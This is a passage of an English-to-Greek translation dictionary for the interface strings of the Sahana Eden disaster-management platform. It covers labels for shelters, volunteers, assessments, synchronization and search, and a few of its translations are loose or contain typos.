'Looting': 'Λεηλασία',
'Major outward damage': 'Κύρια εξωτερική ζημιά',
'Manage Sub-Category': 'Διαχείριση Υπο-Κατηγορίας',
'Manage volunteers by capturing their skills, availability and allocation': 'Διαχείρισης εθελοντών με καταγραφή και χρήση, ικανοτήτων, διαθεσιμότητα & θέση',
'Managing, Storing and Distributing Relief Items': 'Διαχείρηση, Αποθήκευση και διανομή υλικού βοήθειας',
'Managing, Storing and Distributing Relief Items.': 'Διαχείρηση, Αποθήκευση και διανομή υλικού βοήθειας',
'Many': 'Πολλά',
'Map Service Catalog': 'Κατάλογος Χαρτογραφικών Υπηρεσιών',
'Map Width': 'Πλάτος Χάρτη',
'Map': 'χάρτης',
'Marital Status': 'Οικογενειακή κατάσταση',
'Marker Details': 'Λεπτομέρειες Marker',
'Marker added': 'Προστέθηκε δείκτης (marker)',
'Master Message Log to process incoming reports & requests': 'Συνολική Καταγραφή μηνυμάτων (Log) για την επεξεργασία εισερχομένων αναφορών και αιτημάτων ',
'Master Message Log': 'Κύρια καταγραφή μηνυμάτων (Master log)',
'Matrix of Choices (Only one answer)': 'Πίνακας επιλογών (Μόνο μία απάντηση)',
'Maximum weight capacity of the Storage Location followed by choosing the unit from the drop down list.': 'Μέγιστη δυνατότητα βάρους αποθήκευσης του αποθηκευτικού χώρου, που ακολουθείται από την επιλογή της μονάδας από αναδυόμενο menu επιλογών ',
'Member removed from Group': 'Η ιδιότητα μέλους διαγράφηκε',
'Membership updated': 'Ενημέρωση Συνδρομής Μέλους',
'Message Details': 'Λεπτομέρειες Μηνύματος',
'Message added': 'Μήνυμα Προστέθηκε',
'Message': 'Μήνυμα',
'Metadata added': 'Μεταδεδομένα προστέθηκαν',
'Metadata': 'Μεταδεδομένα',
'Meteorological (inc. flood)': 'Μετεωρολογικό (συμπ. πλημμύρας)',
'Migrants or ethnic minorities': 'Μετανάστες ή Εθνικές μειονότητες',
'Military': 'Στρατιωτικό',
'Miscellaneous': 'Διάφορα',
'Moderator': 'Μεσολαβητής(Moderator)',
'Modify Information on groups and individuals': 'Τροποποίησε πληροφορίες σε ομάδες ή άτομα',
'Monday': 'Δευτέρα',
'More': 'περισσότερο',
'Multiplicator': 'Πολλαπλασιαστής',
'Municipalities': 'δήμοι',
'Municipality': 'δήμος',
'N/A': 'Μη Εφαρμόσιμο (Μ/Ε)',
'Name and/or ID': 'Όνομα ή/και ID',
'Name of Storage Bin Type.': 'Όνομα τύπου αποθηκευτικού μέσου',
'Name': 'Όνομα',
'Name/Model/Type': 'Όνομα/Μοντέλο/Τύπος',
'National ID Card': 'Αριθμός (Εθνικής) Ταυτότητας',
'National NGO': 'Εθνικός μη Κυβερνητικός Οργανισμός',
'Nationality': 'Εθνικότητα',
'Nautical Accident': 'Ναυτικό Συμβάν',
'Nautical Hijacking': 'Ναυτική Πειρατεία',
'Need Type added': 'Τύπος ανάγκης προστέθηκε',
'Need to specify a role!': 'Πρέπει να καθορίσετε ένα ρόλο!',
'New Checklist': 'Νέος κατάλογος ελέγχου',
'New Request': 'Νέο αίτημα',
'New': 'Νέο',
'No Addresses currently registered': 'Δεν έχει καταγραφεί ακόμη Διεύθυνση',
'No Assessments currently registered': 'Δεν έχουν εγγραφεί ακόμη Εκτιμήσεις',
'No Baseline Types currently registered': 'Δεν υπάρχουν Τύποι Αρχικοποίησης δηλωμένοι προς το παρών',
'No Baselines currently registered': 'Δεν έχουν καταχωρηθεί ακόμη baselines',
'No Bundles currently registered': 'Δεν υπάρχουν πακέτα προς το παρών δηλωμένα',
'No Category<>Sub-Category<>Catalog Relation currently registered': 'Χωρίς Κατηγορία<>Υπο-Κατηγορία<>Υπάρχει εγγεραμένη σχέση των καταλόγων',
'No Cluster Subsectors currently registered': 'Δεν έχει καταγραφεί ακόμη ομάδα υποκατηγοριών',
'No Distribution Items currently registered': 'Δεν έχουν εγγραφεί ακόμη αντικείμενα για διανομή',
'No Groups currently defined': 'Δεν έχουν οριστεί ακόμη Ομάδες',
'No Hospitals currently registered': 'Δεν υπάρχουν Νοσοκομεία Καταγεγραμμένα',
'No Image': 'Χωρίς Εικόνα',
'No Images currently registered': 'Δεν έχουν καταχωρηθεί εικόνες',
'No Impact Types currently registered': 'Δεν είναι ακόμη καταχωρημένοι ακόμη τύποι Επιπτώσεων',
'No Incidents currently registered': 'Δεν έχουν καταγραφεί περιστατικά ακόμη',
'No Item Catalog Category currently registered': 'Καμία κατηγορία καταλόγου αντικειμένων δεν έχει ακόμη εγγραφεί',
'No Markers currently available': 'δεν υπάρχουν διαθέσιμοι δείκτες (μαρκαδόροι - markers)',
'No Matching Records': 'Δεν βρέθηκαν εγγραφές ',
'No Members currently registered': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'No Memberships currently defined': 'Δεν έχουν ορισθεί ακόμη συμμετοχές μελών',
'No People currently registered in this shelter': 'Δεν εγγραφεί ακόμη άνθρωποι σε αυτό το καταφύγιο',
'No Persons currently reported missing': 'Δεν έχουν αναφερθεί ακόμη αγνοούμενοι',
'No Photos found': 'Δεν βρέθηκαν φωτογραφίες',
'No Presence Log Entries currently registered': 'Δεν έχουν καταγραφεί ακόμη εισαγωγές παρουσίας',
'No Projections currently defined': 'Δεν έχουν ορισθεί προβολικά συστήματα',
'No Projects currently registered': 'Δεν υπάρχουν Έργα προς το παρών καταχωρημένα',
'No Sections currently registered': 'Δεν έχουν εγγραφεί /οριστεί τμήματα ακόμη',
'No Sectors currently registered': 'Δεν έχουν ακόμη καταγραφεί τομείς',
'No Shelters currently registered': 'Δεν έχουν καταγραφεί ακόμη καταφύγια',
'No Shipment Transit Logs currently registered': 'Δεν έχουν εγγραφεί ακόμη Δελτία αποστολών.',
'No Skill Types currently set': 'Δεν έχουν ορισθεί τύποι προσόντων - ικανοτήτων',
'No Staff Types currently registered': 'Δεν καταχρηθεί ακόμη κατηγορίες Προσωπικού',
'No Storage Bin Type currently registered': 'Δεν έχει καταγραφεί ακόμη τύπος αποθηκευτικού χώρου (Storage Bin)',
'No Survey Questions currently registered': 'Δεν έχουν εγγραφεί ερωτήσεις έρευνας',
'No Survey Sections currently registered': 'Δεν έχουν εγγραφεί κατηγορίες έρευνας ακόμη',
'No Tickets currently registered': 'Δεν έχουν εγγραφεί ακόμη εισιτήρια',
'No Units currently registered': 'Δεν έχουν εγγραφεί ακόμη μονάδες',
'No Users currently registered': 'Δεν έχουν εγγραφεί ακόμη χρήστες',
'No Warehouse Items currently registered': 'Δεν έχουν εγγραφεί ακόμη αντικείμενα αποθήκης',
'No Warehouses currently registered': 'Δεν έχουν καταχωρηθεί προς το παρών αποθήκες',
'No access at all': 'Δεν υπάρχει καθόλου πρόσβαση',
'No contact information available': 'Δεν διαθέσιμες πληροφορίες επικοινωνίας',
'No contacts currently registered': 'Δεν έχουν ορισθεί ακόμη σημεία επαφών',
'No data in this table - cannot create PDF!': 'Δεν υπάρχουν δεδομένα στο Πίνακα - Αδύνατη η δημιουργία PDF!',
'No entries found': 'Δεν βρέθηκαν εισαγωγές εγγραφών',
'No linked records': 'Δεν υπάρχουν συνδεδεμένα αρχεία - εγγραφές',
'No pending registrations found': 'Δεν βρέθηκαν εγγραφές σε αναμονή (pending)',
'No pending registrations matching the query': 'Δεν υπάρχουν εκρεμείς εγγραφές που να ταιριάζουν στο ερώτημα',
'No positions currently registered': 'Δεν έχουν εγγραφεί ακόμη θέσεις',
'No problem group defined yet': 'Δεν έχει οριστεί ακόμη ομάδα προβλήματος',
'No report available.': 'Δεν υπάρχει διαθέσιμη αναφορά',
'No service profile available': 'Δεν υπάρχει προφίλ υπηρεσίας διαθέσιμο',
'No synchronization': 'Μη συγχρονισμός',
'No template found!': 'Δεν βρέθηκε πρότυπο !',
'No volunteer information registered': 'Δεν έχουν εγγραφεί πληροφορίες εθελοντών',
'Noodles': 'Ζυμαρικά Noodles',
'Not Applicable': 'Μη εφαρμόσιμο',
'Not Authorised!': 'Μη εξουσιοδοτημένος',
'Not Possible': 'Αδύνατον',
'Not installed or incorrectly configured.': 'Δεν έχει εγκατασταθεί ή λάθος καθορισμένο (configured)',
'Not yet a Member of any Group': 'Κανένα μέλος δεν έχει ακόμη εγγραφεί',
'Notice to Airmen': 'Ανακοίνωση προς τα Εναέρια Μέσα',
'Number of Rows': 'Αριθμός γραμμών',
'Number of alternative places for studying': 'Αριθμός εναλλακτικών περοιχών για μελέτη',
'Number of deaths during the past 24 hours.': 'Αριθμός θανάτων το τελευταίο 24ώρο.',
'Number of private schools': 'Αριθμός Ιδιωτικών Σχολείων',
'Number/Percentage of affected population that is Female & Aged 0-5': 'Αριθμός/Ποσοστό πληγέντων που γένους θηλυκού και ηλικίας από 0 έως 5 ετών',
'Number/Percentage of affected population that is Female & Aged 6-12': 'Αριθμός/Ποσοστό πληγέντων που είναι Θηλυκού γένους & ηλικίας 6-12',
'Number/Percentage of affected population that is Male & Aged 0-5': 'Αριθμός/Ποσοστό πληθυσμού που επηράζεται και έναι αγόρια κάτω των 5 ετών',
'Number/Percentage of affected population that is Male & Aged 18-25': 'Αριθμός/Ποσοστό επηρεαζόμενου πληθυσμού που είνια άντρες και ηλικίας από 18 έως 25',
'Number/Percentage of affected population that is Male & Aged 26-60': 'Αριθμός / Ποσοστό του πληγέντος πληθυσμού που είναι άρρεν & Ηλικίας 26-60',
'Nutrition': 'Θρέψη',
'Obstetrics/Gynecology': 'Μαιευτικό/Γυναικολογικό',
'Office Details': 'Λεπτομέρειες Γραφείου',
'Office added': 'Προστέθηκε γραφείο - οργανισμός',
'Office deleted': 'Γραφείο Διαγράφηκε',
'On by default?': "Ενεργό εξ' ορισμού;",
'One-time costs': 'Εφ-άπαξ κόστη',
'Open': 'ανοίγω',
'Operating Rooms': 'Κέντρα Επιχειρήσεων',
'Optional. In GeoServer, this is the Workspace Namespace URI. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'Προεραιτικό. Στο GeoServer, αυτό είναι το Workspace Namespace URI. Μέσα στις WFS getCapabilities, αυτό είναι το τμήμα όνοματος FeatureType πριν τα διαλυτικά (:).',
'Options': 'Επιλογές',
'Organization Details': 'Λεπτομέρειες Οργανισμού',
'Organization Registry': 'Οργάνωση Γραμματείας',
'Organization': 'Οργανισμός',
'Organizations': 'Οργανισμοί',
'Origin': 'Προέλευση',
'Other (specify)': 'Άλλο (Περιγράψτε)',
'Other Evidence': 'Λοιπά αποδεικτικά στοιχεία',
'Other Faucet/Piped Water': 'Άλλο πόσιμο νερό (από βρύση-παροχή)',
'Other Isolation': 'Άλλη απομόνωση',
'Other activities of boys 13-17yrs': 'Άλλες δραστηριότητες αγοριών 13 έως 17 ετών',
'Other activities of boys <12yrs before disaster': 'Άλλες δραστηριότητες αγοριών μικρότερων των 12 ετών πριν την καταστροφή',
'Other alternative places for study': 'Άλλες εναλακτικές περιοχές για μελέτη (διάβασμα)',
'Other assistance needed': 'Άλλη απαιτούμενη βοήθεια',
'Other assistance, Rank': 'Άλλη βοήθεια, Ιεραρχήστε',
'Other current health problems, adults': 'Άλλα τρέχοντα προβλήματα υγείας, ενήλικες',
'Other factors affecting school attendance': 'Άλλοι παράγοντες που επηρεάζουν την παρακαλούθηση στο σχολείο',
'Other side dishes in stock': 'Άλλα δευτερεύοντα πιάτα σε απόθεμα',
'Outbound Mail settings are configured in models/000_config.py.': 'Οι ρυθμίσεις του εξερχόμενου Mail καθορίζονται στο models/000_config.py',
'Outgoing SMS handler': 'Διαχειριστής εξερχομένων sms',
'Parent Office': 'Πατρικό Γραφείο',
'Password': 'Συνθηματικό(Password)',
'Pathology': 'Παθολογία',
'Patients': 'Ασθενείς',
'Pediatric Psychiatric': 'Παιδιατρικό Ψυχιατρικό',
'Pediatrics': 'Παιδιατρική',
'Peer Registration Details': 'Λεπτομέρειες εγγραφής peer',
'Peer Registration Request': 'Αίτημα για ελεγχόμενη εγγραφή. ',
'Peer not allowed to push': 'Στον peer δεν επιτρέπεται η προώθηση - push',
'Peer registration request added': 'Αίτημα για ελεγκτή καταχώρησης προστέθηκε',
'Peer': 'Ελεγκτής',
'People Needing Shelter': 'Άτομα που χρειάζονται καταφύγιο',
'Person Details': 'Λεπτομέρειες Ατόμου ',
'Person Registry': 'Δήλωση Ατόμου',
'Person deleted': 'Διαγραφή Ατόμου',
'Person details updated': 'Λεπτομέρειες ατόμου ενημερώθηκαν',
'Person reporting': 'Αναφορά ατόμου',
'Person who observed the presence (if different from reporter).': 'Άτομο το οποίο ανέφερε την παρουσία (εαν είναι δαιφορετικό από αυτόν που αναφέρει)',
'Person': 'Άτομο',
'Personal Effects Details': 'Λεπτομέρεις Προσωπικής επίδρασης',
'Persons in institutions': 'Άτομα σε οργανισμούς',
'Persons with disability (mental)': 'Άτομα με (διανοητική) ανικανότητα ',
'Persons with disability (physical)': 'Άτομα με (φυσικές) ανικανότητες',
'Persons': 'Άτομα',
'Phone 1': 'Τηλέφωνο 1',
'Phone 2': 'Τηλέφωνο 2',
'Phone': 'Τηλέφωνο',
'Photo Details': 'Λεπτομέρειες Φωτογραφίας',
'Please enter a First Name': 'Παρακαλώ εισάγετε το μικρό όνομα',
'Please report here where you are:': 'Παρακαλώ αναφέρατε εδώ τη θέση που βρίσκεστε:',
'Please specify any problems and obstacles with the proper handling of the disease, in detail (in numbers, where appropriate). You may also add suggestions the situation could be improved.': 'Παρακαλώ προσδιορίστε οποιαδήποτε προβλήματα ή εμπόδια για τη σωστή διαχείριση της ασθένειας, με λεπτομέριεα (π.χ. με αριθμούς όπου είναι εφαρμόσιμο). Μπορείτε επίσης να προσθέσετε προτάσεις για την βελτίωση της κατάστασης',
'Please use this field to record any additional information, including a history of the record if it is updated.': 'Παρακαλώ χρησιμοποιήστε αυτό το πεδίο για να καταγράψετε επιπλέον πληροφορίες, συμπεριλαμβανομένου της ιστορικής αναδρομής του πεδίου εάν είναι ενημερωμένο.',
'Pledged': 'Δεσμευμένος',
'Pledges': 'Υποχρεώσεις - Δεσμεύσεις',
'Pollution and other environmental': 'Μόλυνση και άλλα περιβαλλοντικά',
'Porridge': 'Πουρές-Χυλός',
'Port Closure': 'Κλείσιμο Λιμανιού',
'Port': 'Πόρτα',
'Postcode': 'Ταχυδρομικός Κώδικας',
'Presence': 'Παρουσία',
'Priority': 'Προτεραιότητα',
'Problem Administration': 'Διαχειριστικό Πρόβλημα',
'Problem connecting to twitter.com - please refresh': 'Πρόβλημα στη σύνδεση με το twitter.com - πατήστε ανανέωση (refresh)',
'Problem updated': 'Το πρόβλημα ενημερώθηκε',
'Problems': 'Προβλήματα',
'Profile': 'Προφίλ',
'Profiles': 'Προφίλ',
'Project Details': 'Λεπτομέρειες έργου',
'Project updated': 'Το έργο ενημερώθηκε',
'Projection deleted': 'Προβολικό Σύστημα διεγράφηκε',
'Projection updated': 'Προβολή ανανεώθηκε',
'Projects': 'Έργα',
'Province': 'Επαρχία',
'Psychiatrics/Pediatric': 'Ψυχιατρική / Παιδιατρική',
'Public and private transportation': 'Δημόσια και Ιδιωτικά μέσα μεταφοράς',
'Pyroclastic Surge': 'Πυροκλαστική τομή',
'Quarantine': 'Καραντίνα',
'Rapid Assessment added': 'Άμεση εκτίμηση προστέθηκε',
'Rapid Assessment': 'Άμεση Εκτίμηση',
'Real World Arbitrary Units': 'Αυθαίρετες μονάδες που αναφέρονται στο πραγματικό κόσμο',
'Recipients': 'Παραλήπτες',
'Record last updated': 'Η τελευταία εγγραφή ενημερώθηκε',
'Recovery Request updated': 'Αίτημα Ανάσυρσης/Αναζήτησης Ενημερώθηκε',
'Recovery Requests': 'Αιτήματα για ανάκτηση-αναζήτηση',
'Recurring costs': 'Επαναλαμβανόμενα έξοδα',
'Recurring': 'Στρατολόγηση',
'Region': 'περιφέρεια',
'Regional Units': 'περιφερειακές ενότητες',
'Regional': 'Τοπική',
'Regions': 'περιφέρειες',
'Register Person into this Shelter': 'Εγγραφή ατόμου σε αυτό το κατάλλυμα',
'Register Person': 'Εγγραφή Προσώπου',
'Registered users can': 'Οι εγγεγραμμένοι χρήστες μπορούν',
'Relocate as instructed in the <instruction>': 'Αλλαγή θέσης όπως καθοδηγηθήκατε στην καθοδήγηση <instruction>',
'Remove Person from Group': 'Διαγραφή μέλους',
'Remove Person from Team': 'Διαγραφή μέλους',
'Removed from Team': 'Η ιδιότητα μέλους διαγράφηκε',
'Replace if Master': 'Αντικατάσταση εαν είστε κύριος',
'Replace if Newer': 'Αντικατάσταση σε περίπτωση νεότερου',
'Report Another Assessment...': 'Αναφορά Άλλης Αξιολόγησης ...',
'Report Type': 'Αναφορά Τύπου',
'Report a Problem with the Software': 'Αναφορά προβλήματος του λογισμικού',
'Report deleted': 'Αναφορά Διαγράφηκε',
'Report my location': 'Ανέφερε τη θέση μου',
'Report the contributing factors for the current EMS status.': 'Αναφορά των παραγόντων που συμμετέχουν στην παρούσα κατάσταση ανάγκης',
'Report them as found': 'Αναφορά ως ευρεθέντα',
'Report updated': 'Αναφορά επικαιροποιήθηκε',
'Report': 'Αναφορά',
'Reporter': 'Αναφορέας',
'Reports': 'Αναφορά',
'Request Item added': 'Προστέθηκε ζητούμενο αντιείμενο ',
'Request Item deleted': 'Διαγραφή αντικειμένου που αιτήθηκε',
'Request Item updated': 'Ζητούμενο Αντικείμενο επικαιροποιήθηκε',
'Request Type': 'Τύπος αιτήματος',
'Request deleted': 'Διαγραφή αιτήματος',
'Request for Role Upgrade': 'Αίτημα για αναβάθμιση ρόλου',
'Request, Response & Session': 'Αίτημα, Ανταπόκριση & Εργασία',
'Reset Password': 'Αρχικοποίηση κωδικού εισόδου - password',
'Resolve Conflict': 'Επίλυση σύγκρουσης (διαφοράς)',
'Resource Inventory': 'Απογραφή των πόρων',
'Resources': 'Πόροι',
'Response deleted': 'Η απάντηση-ανταπόκριση διαγράφηκε',
'Restricted Access': 'Περιορισμένη Πρόσβαση',
'Retail Crime': 'Κλοπή (Retail Crime)',
'Riot': 'Εξέγερση',
'River Details': 'Λεπτομέρειες Ποταμού',
'Road Accident': 'Αυτοκινητιστικό Ατύχημα',
'Road Conditions': 'Κατάσταση Οδών',
'Road Usage Condition': 'Κατάσταση οδικού δικτύου',
'Role Details': 'Λεπτομέρειες Ρόλου ',
'Role deleted': 'Διαγραφή Ρόλου',
'Run Functional Tests': 'Εκτέλεση λειτουργικών δοκιμών',
'SEARCH': 'ΑΝΑΖΗΤΗΣΗ',
'Sahana Community Chat': 'Συνoμιλία(chat) κοινότητας του Sahana',
'Sahana Eden Open Source Disaster Management Platform': 'Πλατφόρμα Διαχείρισης Καταστορφών Ανοικτού Κώδικα Sahana Eden ',
'Sahana Eden Website': 'Διαδικτυακός τόπος Sahana Eden',
'Sahana Login Approval Pending': 'Εκκρεμεί η έγκριση Σύνδεσης στο σύστημα Sahana',
'Sahana: new request has been made. Please login to see if you can fulfil the request.': 'Sahana : νέο αίτημα έχει γίνει. Παρακαλώ συνδεθείτε για να δείτε αν μπορείτε να ικανοποιήσετε το αίτημα ',
'Satellite': 'Δορυφόρος',
'Save any Changes in the one you wish to keep': 'Αποθηκεύστε οποιεσδήποτε αλλαγές σε αυτό που επιθυμείτε να κρατήσετε',
'Scale of Results': 'Κλίμακα Αποτελεσμάτων',
'School/studying': 'Σχολείο/Σπουδαστήριο',
'Search & List Catalog': 'Κατάλογος αναζήτησης και παρουσίασης',
'Search & List Items': 'Αναζήτησε και πρόβαλε αντικείμενα',
'Search & List Sub-Category': 'Αναζήτηση και Λίστα Υποκατηγορίων',
'Search Activity Report': 'Αναζήτηση στις Αναφορές Δραστηριοτήτων',
'Search Assessment Summaries': 'Αναζήτηση περιλήψεων αξιολόγησης',
'Search Baseline Type': 'Τύπος Βασικής αναζήτησης',
'Search Budgets': 'Αναζήτηση Προϋπολογισμών',
'Search Catalog Items': 'Αναζήτηση αντικειμένων καταλόγου.',
'Search Distribution Items': 'Αναζήτηση αντικειμένων για διανομή',
'Search Distributions': 'Αναζήτηση Διανομών',
'Search Documents': 'Αναζήτηση Εγγράφων',
'Search Feature Layers': 'Αναζήτηση στα επίπεδα χαρακτηριστικών',
'Search Identity': 'Αναζήτηση ταυτότητας',
'Search Impact Type': 'Αναζήτηση Τύπου Επιπτώσεων',
'Search Item Catalog(s)': 'Αναζήτηση Θέση Καταλόγου (ων)',
'Search Item Sub-Category(s)': 'Αναζήτηση υπο-κατηγοριών αντικειμένων',
'Search Keys': 'Κλείδες αναζήτησης',
'Search Membership': 'Ψάξιμο εγγραφής',
'Search Memberships': 'Αναζήτηση μελών',
'Search Metadata': 'Αναζήτηση μεταδεδομένων',
'Search Need Type': 'Αναζήτηση τύπου αναγκών',
'Search Needs': 'Ψάξε ανάγκες',
'Search Personal Effects': 'Αναζήτηση Προσωπικών Αποτελεσμάτων(Effects)',
'Search Persons': 'Αναζήτηση Ατόμων',
'Search Projects': 'Αναζήτηση έργων',
'Search Registration Request': 'Αναζήτηση αιτήματος εγγραφής',
'Search Reports': 'Αναφορές Αναζήτησης',
'Search Request': 'Αναζήτηση αιτήματος',
'Search Requests': 'Αναζήτηση αιτημάτων',
'Search Resources': 'Αναζήτηση πόρων',
'Search Roles': 'Αναζήτηση Ρόλων',
'Search Shelter Types': 'Τύποι αναζήτησης Καταφυγίου',
'Search Shipment<>Item Relation': 'Αναζήτηση αποστολής <> Σχέση Αντικειμένου',
'Search Storage Location(s)': 'Αναζήτηση στις θέσεις Αποθήκευσης',
'Search Subscriptions': 'Αναζήτηση Εγγεγραφών',
'Search Tasks': 'Αναζήτηση Καθηκόντων-Έργων',
'Search Themes': 'Θέματα Αναζήτησης',
'Search Tracks': 'Πορείες (γραμμές) αναζήτησης',
'Search Twitter Tags': 'Ψάξε τα tags(ετικέκτες) του twitter',
'Search and Edit Individual': 'Αναζήτηση και επεξεργασία ατοιχείων ατόμου',
'Search for a Person': 'Αναζήτηση Ατόμου',
'Search for a Project': 'Αναζήτηση για έργο',
'Search': 'ερευνώ',
'Secondary Server (Optional)': 'Δευτερεύων server (προαιρετικό)',
'Seconds must be a number between 0 and 60': 'Τα δευτερόλεπτα πρέπει να είναι ένας αριθμός μεταξύ 0 και 60',
'Section Details': 'Λεπτομέρειες Τμήματος',
'Section deleted': 'Τομέας Διαγράφηκε',
'Sectors': 'Τομείς',
'Security Policy': 'Πολιτική Ασφαλείας',
'Security problems': 'Προβλήματα ασφαλείας',
'Select 2 potential locations from the dropdowns.': 'Επιλέξτε 2 εν δυνάμει τοποθεσίες από την αναδυόμενη λίστα',
'Select a question from the list': 'Επιλογή ερώτησης από λίστα',
'Send Alerts using Email &/or SMS': 'Αποστολή Συνεγερμών με email ή sms',
'Send Shipment': 'Αποστολή Φορτίου',
'Send message': 'Στείλε μήνυμα',
'Send new message': 'Στείλε νέο μήνυμα',
'Senior (50+)': 'Ηλικιωμένος (50+)',
'Sensitivity': 'Ευαισθησία',
'Series': 'Σειρά',
'Service or Facility': 'Υπηρεσία ή Εγκατάσταση',
'Service profile added': 'Προφίλ Υπηρεσίας προστέθηκε',
'Services Available': 'Διαθέσιμες Υπηρεσίες',
'Services': 'Υπηρεσίες',
'Setting added': 'Ρύθμιση προστέθηκε',
'Settings': 'Ρυθμίσεις',
'Share a common Marker (unless over-ridden at the Feature level)': 'Μοιράζονται ένα κοινό Marker (εκτός υπερ-επιβαίνουν σε επίπεδο Feature)',
'Shelter Registry': 'Καταγραφή Καταλύμματος',
'Shelter Service Details': 'Λεπτομέρειες υπηρεσιών καταφυγίου',
'Shelter Services': 'Υπηρεσίες Καταφυγίων',
'Shelter added': 'Καταφύγιο προστέθηκε',
'Shelter': 'Κατάλλημα',
'Shipment<>Item Relations Details': 'Αποστολή<>Λεπτομέρειες σχέσεων αντικειμένου',
'Shipments To': 'Αποστολή προς',
'Shooting': 'Πυροβολισμός',
'Short Description': 'Σύντομη Περιγραφή',
'Show on map': 'Θέση στο χάρτη',
'Site Location Description': 'Περιγραφή Θέσης Περιοχής',
'Site added': 'Περιοχή προστέθηκε',
'Site deleted': 'Περιοχή διαγράφηκε',
'Site updated': 'Η περιοχή (site) ενημερώθηκε',
'Sites': 'Τοποθεσίες',
'Skill Type added': 'Τύπος προσόντων προστέθηκε',
'Skill added': 'Προσθήκη Ικανότητας ',
'Skill deleted': 'Προσόν διαγράφηκε',
'Snow Fall': 'Χιονόπτωση',
'Snow Squall': 'Squall χιονιού',
'Solid waste': 'Στερεά απόβλητα',
'Solution updated': 'Επίλυση (solution) ενημερώθηκε',
'Sorry, that page is forbidden for some reason.': 'Λυπούμαστε, η σελίδα αυτή είναι απαγορευμένη για κάποιο λόγο.',
'Sorry, there are no addresses to display': 'Συγνώμη, Δεν υπάρχουν Διευθύνσεις για προβολή.',
'Source ID': 'ID Πηγής',
'Source Time': 'Πηγαία ώρα',
'Special needs': 'Ειδικές ανάγκες',
'Specify a descriptive title for the image.': 'Ορίστε ένα περιγραφικό τίτλο για την εικόνα',
'Specify the number of sets needed per 24h': 'Προσδιορίστε τον αριθμό των συνόλων(sets) που είναι απαραίτητα ανα 24ώρο',
'Staff Type Details': 'Λεπτομέρειες Τύπου Προσωπικού',
'Staff Type added': 'Τύπος Προσωπικού προστέθηκε',
'Staff Type deleted': 'Τύπος προσωπικού διαγράφηκε',
'Staff deleted': 'Προσωπικό διαγράφηκε',
'Stakeholders': 'Οι ενδιαφερόμενοι',
'Start date': 'Ημερομηνία Έναρξης',
'Stationery': 'Γραφική Ύλη',
'Status deleted': 'Κατάσταη διαγράφηκε',
'Status of operations of the emergency department of this hospital.': 'Επιχειρησιακή κατάσταση του τμημάτος επειγουσών περιστατικών του Νοσοκομείου',
'Storage Bin Type updated': 'Τύπος Αποθηκευτικού μέσου ανανεώθηκε',
'Storage Bin Type': 'Τύπος Αποθηκευτικού χώρου',
'Storage Bins': 'Καλάθια αποθήκευσης',
'Store spreadsheets in the Eden database': 'Αποθήκευση λογιστικών φύλλων στη βάση δεδομένων του Eden',
'Storm Force Wind': 'Άνεμοι καταιγίδας',
'Street': 'Οδός',
'Sub Category': 'Υπο κατηγορία',
'Submit new Level 1 assessment (full form)': 'Υποβολή νέας εκτίμησης Επιπέδου 1 (πλήρης φόρμα)',
'Subscription deleted': 'Η συνδρομή/εγγραφή διαγράφηκε',
'Subscriptions': 'Εγγραφές - Συνδρομές',
'Subsistence Cost': 'Κόστος επιχορήγησης',
'Suggest not changing this field unless you know what you are doing.': 'Μην αλλάζετε αυτό το πεδίο εκτός αν γνωρίζετε επακριβώς τι κάνετε.',
'Support Request': 'Αίτημα (αναζήτηση) υποστήριξης',
'Support Requests': 'Αιτήματα Υποστήριξης',
'Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.': 'Υποστηρίζει τη λήψη απόφασης από μεγάλες ομάδες εδικών διαχείρισης κρίσεων βοηθώντας τις ομάδες να δημιουργούν ιεραρχημένες λίστες - καταλόγους.',
'Survey Name': 'Όνομα έρευνας',
'Survey Question updated': 'Ερώτηση Έρευνας ενημερώθηκε',
'Survey Section added': "Τμήμα 'Ερευνας προστέθηκε",
'Survey Section updated': 'Έρευνα Τμήματος ενημερώθηκε',
'Survey Series deleted': 'Σειρά Ερευνών διαγράφηκε',
'Survey Series updated': 'Σειρά Ερευνών ανανεώθηκε',
'Survey Series': 'Σειρά ερευνών',
'Survey Template added': 'Προστέθηκε πρότυπο έρευνας καταγραφής',
'Sync Conflicts': 'Προβλήματα (διενέξεις) Συγχρονισμού',
'Sync Now': 'Συγχρονίστε τώρα.',
'Sync Partners are instances or peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) that you want to sync information with. Click on the link on the right to go the page where you can add sync partners, search for sync partners and modify them.': 'Οι συγχρονιζόμενοι συνεργάτες είναι στιγμιότυπα ή peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) με τους οποίους θέλεις να συγχρονίσεις πληροφορίες. Πατήστε στο σύνδεσμο στα δεξιά για να πάτε στη σελίδα όπου μπορείτε να προσθέσετε συγχρονιζόμενους συνεργάτες, να αναζητήσετε συγχρονιζόμενους συνεργάτες και να τους τροποποιήσετε.',
'Sync Partners': 'Συνεργάτες για συγχρονισμό',
'Sync Pools': 'Συγχρόνισε τις δεξαμενές (pools)',
'Sync Schedule': 'Συγχρονισμός Πλάνου(Schedule)',
'Synchronization Details': 'Λεπτομέρειες Συγχρονισμού',
'Synchronization History': 'Ιστορικό Συγχρονισμού',
'Synchronization Settings': 'Ρυθμίσεις Συγχρονισμού',
'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. This page provides you with information about how to use the synchronization features of Sahana Eden': 'Ο συγχρονισμός σας επιτρέπει να μοιράζεστε δεδομένα που έχετε με άλλους και να ενημέρώνετε τη δική σας βάση δεδομένων από άλλους peers. Αυτή η σελίδα σας παρέχει πληροφορίες για το πως να χρησιμοποιείτε τις δυνατότιτες συγχρονισμού στο Sahana Eden',
'Syncronisation History': 'Ιστορικό συγχρονισμού',
'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'Η εφαρμογή παρακολουθεί τους εθελοντές που επιχειρούν στα πεδία των συμβάντων. Εκτός από τις περιοχές των ενεργών συμβάντων καταγράφεται το φάσμα και το είδος των παρερχόμενων υπηρεσιών σε κάθε περιοχή.',
'Task added': 'Καθήκον προστέθηκε',
'Task deleted': 'Εργασία Διαγράφηκε',
'Task updated': 'Η εργασία ενημερώθηκε',
'Tasks': 'Καθήκοντα',
'Team Details': 'Λεπτομέρειες Ομάδος',
'Team Head': 'Επικεφαλής Ομάδος',
'Team Leader': 'Αρχηγός ομάδος',
'Team Type': 'Τύπος Ομάδας',
'Telephony': 'Τηλεφωνία',
'Text Color for Text blocks': 'Χρώμα κειμένου για τις περιοχές-κουτιά κειμένου',
